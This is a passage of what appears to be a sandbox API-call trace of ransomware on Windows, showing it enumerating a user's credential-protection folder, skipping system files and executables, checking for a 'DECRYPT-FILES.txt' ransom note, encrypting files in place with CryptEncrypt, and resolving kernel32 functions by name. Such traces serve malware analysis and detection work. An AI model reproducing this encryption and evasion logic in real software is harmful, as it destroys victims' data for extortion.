HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\All Users") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="AhnLab") returned 0x0 [0180.727] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.727] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0180.727] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.727] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\0a16c9.tmp") returned 121 [0180.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0180.750] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.750] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt") returned 128 [0180.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0180.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0180.750] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeedae700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeedae700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.750] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.750] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeedae700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeedae700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.750] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.750] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.750] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeedae700, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeedae700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeedae700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.750] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.750] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.750] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.750] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.750] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.750] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0180.750] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.751] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0180.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\0a16c9.tmp" [0180.751] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.751] CloseHandle (hObject=0x0) returned 0 [0180.751] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.751] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaad6bb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", cAlternateFileName="BE5B4F~1.HYG")) returned 1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="DECRYPT-FILES.txt") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="autorun.inf") returned 1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="boot.ini") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="desktop.ini") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="ntuser.dat") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="iconcache.db") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="bootsect.bak") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="ntuser.dat.log") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="thumbs.db") returned -1 [0180.751] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa", lpString2="Bootfont.bin") returned -1 [0180.751] lstrlenW (lpString="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa") returned 42 [0180.752] lstrcmpiW (lpString1="HyGSa", lpString2="lnk") returned -1 [0180.752] lstrcmpiW (lpString1="HyGSa", lpString2="exe") returned 1 [0180.752] lstrcmpiW (lpString1="HyGSa", lpString2="sys") returned -1 [0180.752] lstrcmpiW (lpString1="HyGSa", lpString2="dll") returned 1 [0180.752] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0180.752] lstrlenW (lpString="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa") returned 42 [0180.752] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0180.752] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa" [0180.752] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.hygsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.752] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=732) returned 1 [0180.752] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.752] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.753] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.753] CloseHandle (hObject=0x280) returned 1 [0180.753] CloseHandle (hObject=0x27c) returned 1 [0180.753] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.754] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaad45a00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaad45a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaad45a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.754] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.754] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaad91cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred.U7XTpy", cAlternateFileName="PREFER~1.U7X")) returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="DECRYPT-FILES.txt") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="autorun.inf") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="boot.ini") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="desktop.ini") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="ntuser.dat") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="iconcache.db") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="bootsect.bak") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="ntuser.dat.log") returned 1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="thumbs.db") returned -1 [0180.754] lstrcmpiW (lpString1="Preferred.U7XTpy", lpString2="Bootfont.bin") returned 1 [0180.754] lstrlenW (lpString="Preferred.U7XTpy") returned 16 [0180.754] lstrcmpiW (lpString1="U7XTpy", lpString2="lnk") returned 1 [0180.754] lstrcmpiW (lpString1="U7XTpy", lpString2="exe") returned 1 [0180.754] lstrcmpiW (lpString1="U7XTpy", lpString2="sys") returned 1 [0180.754] lstrcmpiW (lpString1="U7XTpy", lpString2="dll") returned 1 [0180.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0180.754] lstrlenW (lpString="Preferred.U7XTpy") returned 16 [0180.754] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0180.754] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="Preferred.U7XTpy" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy" [0180.754] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.u7xtpy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.755] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=288) returned 1 [0180.755] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.755] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.755] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.755] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.755] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.756] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0180.756] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.756] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.756] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.757] CloseHandle (hObject=0x280) returned 1 [0180.757] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.757] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0180.758] CloseHandle (hObject=0x0) returned 0 [0180.758] CloseHandle (hObject=0x27c) returned 1 [0180.758] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.758] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.758] GetTickCount () returned 0x1134a0b [0180.758] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.758] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.758] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.759] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.759] lstrlenA (lpString="kernel32.dll") returned 12 [0180.759] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.759] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.759] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.759] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.759] lstrlenA (lpString="ADDATOMA") returned 8 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.759] lstrlenA (lpString="ADDATOMW") returned 8 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.759] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.759] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.759] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.759] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.759] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.760] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.760] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.760] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.760] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.760] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.760] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.760] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.760] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.760] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.760] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.760] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.760] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.760] lstrlenA 